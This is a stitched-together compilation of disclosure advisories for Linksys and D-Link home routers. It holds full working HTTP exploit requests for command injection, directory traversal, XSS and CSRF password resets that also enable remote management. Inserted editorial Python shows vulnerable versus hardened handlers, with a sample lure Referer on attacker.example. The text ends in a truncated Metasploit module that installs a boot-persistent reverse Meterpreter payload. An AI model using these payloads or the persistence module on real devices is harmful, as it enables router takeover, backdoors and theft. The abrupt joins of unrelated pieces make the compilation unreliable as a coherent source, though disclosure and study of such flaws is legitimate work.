Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:
HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 00:00:29 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png

* For changing the current password there is no request of the current password - tested on E1500

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

Example Request:
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/Management.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 311

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3'%3balert('pwnd')//

Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 300

submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png

* Redirection - tested on E1500
=> Parameter: submit_button=http://www.pwnd.pwnd%0a

Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.

Example Exploit:
POST /apply.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/Wireless_Basic.asp
Authorization: Basic xxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 290

submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-004
Twitter: @s3cur1ty_de

============
Time Line:
============
October 2012 - discovered vulnerability
21.10.2012 - contacted Linksys with vulnerability details
23.10.2012 - Linksys requested to check new firmware v1.0.05 build 1
27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1
27.10.2012 - contacted Linksys with vulnerability details in release v1.0.05 build 1
29.10.2012 - Linksys responded with case number
13.11.2012 - /me requested update of the progress
15.11.2012 - Linksys sends Beta Agreement
16.11.2012 - Linksys sends the Beta Firmware for testing
16.11.2012 - tested Beta version
18.11.2012 - informed Linksys about the results
30.11.2012 - reported the same OS Command injection vulnerability in model E2500
10.12.2012 - /me requested update of the progress
23.12.2012 - Update to Linksys with directory traversal vulnerability
09.01.2013 - Case closed
05.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
-
Linksys WRT160N suffers from cross site scripting, cross site request forgery, and remote command injection vulnerabilities.

Device Name: Linksys WRT160Nv2
Vendor: Linksys/Cisco

============
Device Description:
============

Best For: Delivers plenty of speed and coverage, so large groups of users can go online, transfer large files, print, and stream stored media

Features:
* Fast Wireless-N connectivity frees you to do more around your home
* Easy to set up and use, industrial-strength security protection
* Great for larger homes with many users

Source: http://homestore.cisco.com/en-us/routers/Linksys-WRT160N-Wireless-N-Router-Front-Page_stcVVproductId53934616VVcatId552009VVviewprod.htm

============
Vulnerable Firmware Releases:
============

Firmware Version: v2.0.03 build 009

============
Shodan Dorks
============

Shodan Search: WRT160Nv2 => 4072 results

============
Vulnerability Overview:
============

* OS Command Injection
=> parameter: ping_size

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e101|&ping_times=5&traceroute_ip=

Changing the request method from HTTP POST to HTTP GET makes the exploitation easier (CSRF):

http://Target-IP/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=|ping%20192%2e168%2e178%2e100|&ping_times=5&traceroute_ip=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-OS-Command-Injection.png

* Directory traversal:
=> parameter: next_page

Access local files of the device. You need to be authenticated or you have to find other methods for accessing the device.

Request:

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Wireless_Basic.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version

Response:

HTTP/1.1 200 Ok
Server: httpd
Date: Thu, 01 Jan 1970 02:53:16 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/html
Connection: close

Linux version 2.4.30 (tcy@cybertan) (gcc version 3.3.6) #9 Fri Aug 21 11:23:36 CST 2009

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WRT160Nv2-directory-traversal.png

* XSS

Injecting scripts into the parameters ddns_enable, need_reboot, ping_ip and ping_size reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

=> Setup => DDNS => parameter ddns_enable

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/DDNS.asp
Authorization: Basic XXXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 122

submit_button=DDNS&action=&change_action=gozila_cgi&submit_type=&wait_time=6&ddns_changed=&ddns_enable='%3balert('pwnd')//

=> Setup => Basic Setup => parameter need_reboot

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/index.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 568

pptp_dhcp=0&submit_button=index&change_action=&submit_type=&action=Apply&now_proto=pppoe&daylight_time=1&lan_ipaddr=4&wait_time=0&need_reboot='%3balert('pwnd')//&dhcp_check=&lan_netmask_0=&lan_netmask_1=&lan_netmask_2=&lan_netmask_3=&timer_interval=30&language=EN&wan_proto=pppoe&ppp_username=pwnd&ppp_passwd=d6nw5v1x2pc7st9m&ppp_service=pwnd&ppp_demand=0&ppp_redialperiod=30&wan_hostname=pwnd&wan_domain=pwnd&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=178&lan_ipaddr_3=233&lan_netmask=255.255.255.0&lan_proto=static&time_zone=-08+1+1&_daylight_time=1

=> Administration => Diagnostics => parameters ping_ip and ping_size

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Diagnostics.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1'><script>alert(2)</script>&ping_size=32'><script>alert(1)</script>&ping_times=5&traceroute_ip=

It is possible that there are many more XSS vulnerabilities in this device. I have stopped testing here ... so feel free to check more parameters for input validation problems and XSS vulnerabilities.

* For changing the current password there is no request for the current password
=> parameters: http_passwd and http_passwdConfirm

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /apply.cgi HTTP/1.1
Host: 192.168.178.233
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.233/Management.asp
Authorization: Basic XXXX=
Content-Type: application/x-www-form-urlencoded
Content-Length: 250

submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

* CSRF for changing the password without knowing the current one; the attacker is also able to activate remote management:

http://<IP>/apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&wait_time=4&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0

============
Solution
============

No known solution available.

============
Credits
============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============
Time Line:
============

December 2012 - discovered vulnerability
23.12.2012 - contacted Linksys and gave them detailed vulnerability details
11.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
-
D-Link DIR-615 rev H suffers from cross site request forgery, information disclosure, and remote command injection vulnerabilities.

Device Name: DIR-615 - Hardware revision H1
Vendor: D-Link

============
Device Description:
============

Delivering great wireless performance, network security and coverage, the D-Link Wireless N 300 Router (DIR-615) is ideal for upgrading your existing wireless home network.

Source: http://www.dlink.com/us/en/support/product/dir-615-wireless-n-300-router

============
Vulnerable Firmware Releases:
============

Firmware Version : 8.04, Tue, 4, Sep, 2012
Firmware Version : 8.04, Fri, 18, Jan, 2013

============
Vulnerability Overview:
============

* OS-Command Injection:
=> Parameter: ping_ipaddr

The vulnerability is caused by missing input validation in the ping_ipaddr parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:

http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
http://<IP>/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr=

Request:

GET /tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60uname%20-a%60&ping6_ipaddr= HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.178.199/adv_virtual_batch.htm
Connection: keep-alive

Response:

HTTP/1.0 200 OK
Pragma: no-cache
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript" src="common.js.htm"></script>
<script language="javascript">
CommJs({init:INC_COMM_PAGE,group:PAGE_GROUP_TOOLS});
var pingResult="Domain";
var pingip="ipv4_1.1.1.1Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown"; <<==
var vctinfo= [
{ethport:'0', status:'0', rate:'0', dup:'0'},
{ethport:'1', status:'0', rate:'0', dup:'0'},
{ethport:'2', status:'0', rate:'0', dup:'0'},

You have wget on the device for downloading further tools.

* Information Disclosure:

Detailed device information with configuration details.

Request:
http://192.168.178.199/gconfig.htm

Response:
var ModelName = 'DIR-615';
var systemName='DLINK-DIR615';
var FunctionList = {HAS_PRIORITY_WEB_ACCOUNT:1,PRIORITY_WEB_ACCOUNT_NUM:1,HAS_IPV6_AUTO_CONFIG:1,DHCPD_HAS_OPTION_66:1,SUPPORT_WPS_DISABLE_PINCODE:1,SUPPORT_IPV6_DSLITE:1,HAS_IPV6_6RD:0,NON_USED:0}

* For changing the current password there is no request for the current password

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

POST /tools_admin.htm HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/tools_admin.htm
Cookie: uid=wBIfbpFoJ9
Content-Type: application/x-www-form-urlencoded
Content-Length: 77

page=tools_admin&admin_password1=admin&admin_password2=admin&hostname=DIR-615

* CSRF for changing the password without knowing the current one:

http://192.168.178.199/tools_admin.htm?page=tools_admin&admin_password1=admin2&admin_password2=admin2&hostname=DIR-615

============
Solution
============

No known solution available.

============
Credits
============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============
Time Line:
============

November 2012 - discovered vulnerability
11.11.2012 - contacted D-Link via the web interface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-Link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem of the user and/or browser and they will not provide a fix
xx.02.2013 - no update from D-Link, public release

=====================
Advisory end
=====================

Source: PacketStorm
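The password-change requests in the Linksys WRT160N and D-Link DIR-615 advisories above go through because the CGI accepts any request that arrives with the browser's stored credentials, on GET as well as POST, and never asks for the current password. The following Python is an added example by the editor, not code from the advisories or from either vendor, that models such a handler: change_password_vulnerable mirrors the behaviour the advisories describe, and change_password_hardened adds the three checks the firmware lacks (POST only with an Origin/Referer match, a per-session synchronizer token, and re-authentication with the current password). The Session and form structures, the KDF parameters, the host 192.168.178.199 and the lure page are constructed for the example.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

KDF_ITERATIONS = 50_000   # illustrative; the point is re-authentication, not the KDF choice


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, KDF_ITERATIONS)


class Session:
    """Authenticated admin session: the Basic-auth or cookie state a browser re-sends on its own."""

    def __init__(self, password: str):
        self.salt = secrets.token_bytes(16)
        self.password_hash = _hash(password, self.salt)
        # Synchronizer token: random per session, embedded in the real form, unknown to a third-party page.
        self.csrf_token = secrets.token_urlsafe(32)

    def check_password(self, candidate: str) -> bool:
        return hmac.compare_digest(self.password_hash, _hash(candidate, self.salt))

    def set_password(self, new: str) -> None:
        self.salt = secrets.token_bytes(16)
        self.password_hash = _hash(new, self.salt)


def change_password_vulnerable(session: Session, form: dict) -> bool:
    """What the advisories describe: two matching fields suffice, from any page, on any method."""
    new = form.get("admin_password1", "")
    if new and new == form.get("admin_password2"):
        session.set_password(new)
        return True
    return False


def origin_allowed(headers: dict, expected_host: str) -> bool:
    """Reject a request whose Origin (or, failing that, Referer) names another host, or that carries neither."""
    src = headers.get("Origin") or headers.get("Referer")
    return bool(src) and urlsplit(src).hostname == expected_host


def change_password_hardened(session: Session, method: str, headers: dict, form: dict, expected_host: str) -> bool:
    """Same operation with the checks the firmware lacks: POST only, same origin, token, current password."""
    if method != "POST":
        return False                                              # the CSRF links in the advisories are GETs
    if not origin_allowed(headers, expected_host):
        return False
    if not hmac.compare_digest(form.get("csrf_token", ""), session.csrf_token):
        return False                                              # a lure page cannot read the token
    if not session.check_password(form.get("current_password", "")):
        return False                                              # re-authentication
    new, confirm = form.get("admin_password1", ""), form.get("admin_password2", "")
    if not new or new != confirm:
        return False
    session.set_password(new)
    session.csrf_token = secrets.token_urlsafe(32)                # rotate after a sensitive change
    return True


# Constructed sample: the request a victim's browser makes when it follows the CSRF link from the advisory.
CROSS_SITE_HEADERS = {"Referer": "http://attacker.example/lure.html"}
CROSS_SITE_FORM = {"page": "tools_admin", "admin_password1": "admin2",
                   "admin_password2": "admin2", "hostname": "DIR-615"}
```

The Origin check alone is not enough: a bare GET from an image tag or a privacy extension can strip both Origin and Referer, which is why a missing header is treated as a failure and the token is the real guard. Requiring the current password is what defeats the "attacker needs access to an authenticated browser" case even when the CSRF checks are bypassed.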
-
Linksys WAG200G suffers from cross site scripting and remote command injection vulnerabilities.

Device Name: Linksys WAG200G
Vendor: Linksys/Cisco

============
Device Description:
============

The WAG200G is a Linksys Wireless-G ADSL Home Gateway which has a high-speed ADSL2+ modem that gives you a fast connection to the Internet.

Source: http://homesupport.cisco.com/en-us/support/gateways/WAG200G

============
Vulnerable Firmware Releases
============

Firmware-Version: v1.01.06

============
Shodan Dorks
============

Shodan Search: WAG200G

============
Vulnerability Overview:
============

* OS Command Injection
=> Parameter timer_interval=`%20ping%20-c2%20192%2e168%2e178%2e104%20`

The vulnerability is caused by missing input validation in the timer_interval parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.

Example Exploit:

POST /setup.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/setup.cgi?next_file=Setup.htm
Authorization: Basic #########
Content-Type: application/x-www-form-urlencoded
Content-Length: 1051
Connection: close

wan_encapmode=pppoa&wan_multiplex=llc&pppoa_multiplex=vc&wan_qostype=ubr&wan_autodetect=enable&dsl_modulation=MMODE&bridged_dhcpenable=dhcp&ipppoe_enable=0&PoeUserName=admin&PoePasswd=admin&pppoeDODC=pppoeDODC&poeIdleTime=5&hostname=test&domainname=&mtu_type=auto&lan_ip_1=192&lan_ip_2=168&lan_ip_3=178&lan_ip_4=199&lan_mask=0&lan_dhcp=disable&time_zone=%2B0+2&timer_interval=`%20ping%20192%2e168%2e178%2e104%20`&upgrade_langpkt=1&save=Save+Settings&c4_wan_ip_=&c4_wan_mask_=&c4_wan_gw_=&c4_wan_dns1_=&c4_wan_dns2_=&c4_lan_ip_=192.168.178.199&c4_dhcpserver_ip_=&c4_static_dns0_=&c4_static_dns1_=&c4_static_dns2_=&c4_wan_wins_=&h_wan_encapmode=pppoa&h_wan_multiplex=llc&h_pppoa_multiplex=vc&h_wan_qostype=ubr&h_wan_autodetect=enable&h_dsl_modulation=MMODE&h_bridged_dhcpenable=dhcp&h_pppoeDODC=pppoeDODC&h_mtu_type=auto&h_lan_mask=0&h_lan_dhcp=disable&h_time_zone=%2B0+2&h_auto_dls=disable&PppoeUserName=&PppoePasswd=&PppoaUserName=admin&PppoaPasswd=admin&h_ipppoe_enable=0&h_upgrade_langpkt=1&todo=save&this_file=Setup.htm&next_file=Setup.htm&message=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WAG200-os-command-injection.png

* For changing the password there is no request for the current password.

With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

* Stored XSS

Injecting scripts into the parameter policy_name reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

Access Restrictions -> Enter Policy Name => the script gets executed under Status -> Wireless

POST /setup.cgi HTTP/1.1
Host: 192.168.178.199
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.199/setup.cgi?next_file=AccessRes.htm
Authorization: Basic xxx=
Content-Type: application/x-www-form-urlencoded
Content-Length: 584

access_policy=1&f_status1=enable&policy_name=123"><img%20src%3d"0"%20onerror%3dalert("XSSed1")>&f_status2=deny&time=settimes&starthour=0&startminute=0&endhour=0&endminute=0&save=Save+Settings&h_access_policy=1&h_f_status1=enable&h_f_status2=deny&h_alldays=disable&h_sun=disable&h_mon=disable&h_tue=disable&h_wed=disable&h_thurs=disable&h_fri=disable&h_sat=disable&h_time=settimes&h_starthour=0&h_startminute=0&h_endhour=0&h_endminute=0&h_blocked_service0=None&h_blocked_service1=None&h_svc_type0=icmp&h_svc_type1=icmp&todo=save&this_file=AccessRes.htm&next_file=AccessRes.htm&message=

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/WAG200-stored-xss-access-restrictions.png

============
Solution
============

No known solution available.

============
Credits
============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-016
Twitter: @s3cur1ty_de

============
Time Line:
============

October 2012 - discovered vulnerability
16.10.2012 - contacted Linksys and gave them detailed vulnerability details
16.10.2012 - Linksys responded with case number
13.11.2012 - /me requested update of the progress
15.11.2012 - Case closed
08.02.2013 - public release

=====================
Advisory end
=====================

Source: PacketStorm
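The three router advisories above (WRT160N ping_size, DIR-615 ping_ipaddr, WAG200G timer_interval) share one root cause: a CGI splices a form field into a shell command line, so a pipe or a pair of backticks in the field becomes a second command. The Python below is an added example by the editor, not code from the advisories or from the vendors. vulnerable_ping_command reproduces the splice so the advisories' own payloads can be seen landing in the command string; safe_ping_argv and safe_int show the validation the firmware lacks (parse the address, parse and bound the numbers, hand an argv list to the process with no shell in between); safe_next_page does the equivalent for the WRT160N next_page traversal. The command template, the web root /www and the bounds are assumptions for the example.

```python
import ipaddress
import posixpath

# Assumed template: the advisories show field values reaching a shell, so the CGI does roughly this.
PING_TEMPLATE = "ping -c {times} -s {size} {target}"
SHELL_META = "|`;&$\n"


def vulnerable_ping_command(target: str, size: str, times: str = "5") -> str:
    """The firmware's behaviour: form fields pasted into one shell line, metacharacters and all."""
    return PING_TEMPLATE.format(times=times, size=size, target=target)


def injected(cmd: str) -> bool:
    """True when a composed line carries shell metacharacters the template itself never emits."""
    return any(ch in cmd for ch in SHELL_META)


def safe_int(value: str, lo: int, hi: int) -> int:
    """Parse a numeric field strictly (no shell ever sees the raw string) and bound it."""
    n = int(value.strip())            # ValueError on '|ping 192.168.178.101|' or '` ping -c2 ... `'
    if not lo <= n <= hi:
        raise ValueError("value out of range")
    return n


def safe_ping_argv(target: str, size: str, times: str = "5") -> list:
    """Validated argv for subprocess.run(argv) with no shell; the address is parsed, not pattern-matched."""
    ip = ipaddress.ip_address(target.strip())   # ValueError on '1.1.1.1`uname -a`'
    return ["ping", "-c", str(safe_int(times, 1, 10)), "-s", str(safe_int(size, 0, 65500)), str(ip)]


def safe_next_page(web_root: str, next_page: str) -> str:
    """Resolve next_page under web_root and refuse anything that escapes it (the WRT160N traversal)."""
    if "\x00" in next_page or next_page.startswith("/"):
        raise ValueError("bad path")
    root = web_root.rstrip("/") or "/"
    resolved = posixpath.normpath(posixpath.join(root, next_page))
    if resolved != root and not resolved.startswith(root + "/"):
        raise ValueError("path escapes web root")
    return resolved


def rejects(fn, *args) -> bool:
    """Helper: True when fn(*args) raises ValueError, to show which advisory payloads the checks refuse."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

The argv form is the fix that survives the "hard to fix under the current web server framework" answer vendors give: no escaping rules to get right, because there is no shell to interpret the string. Validation by type (an IP address parses or it does not; a size is an integer in range or it is not) is also what makes the traversal and XSS cases above disappear for the same fields.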
-
This Metasploit module will create a boot persistent reverse Meterpreter session by installing on the target host the payload as a script that will be executed at user logon or system startup depending on privilege and selected startup method.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Registry
  include Exploit::EXE

  def initialize(info={})
    super( update_info( info,
      'Name'          => 'Windows Manage Persistent Payload Installer',
      'Description'   => %q{
        This Module will create a boot persistent reverse Meterpreter session by
        installing on the target host the payload as a script that will be executed
        at user logon or system startup depending on privilege and selected startup
        method.
      },
      'License'       => MSF_LICENSE,
      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ],
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      'Targets'       => [ [ 'Windows', {} ] ],
      'DefaultTarget' => 0,
      'DisclosureDate'=> "Oct 19 2011"
    ))

    register_options(
      [
        OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]),
        OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
        OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]),
        OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']),
      ], self.class)
  end

  # Exploit Method for when exploit command is issued
  def exploit
    print_status("Running module against #{sysinfo['Computer']}")
    rexename = datastore['REXENAME']
    delay = datastore['DELAY']
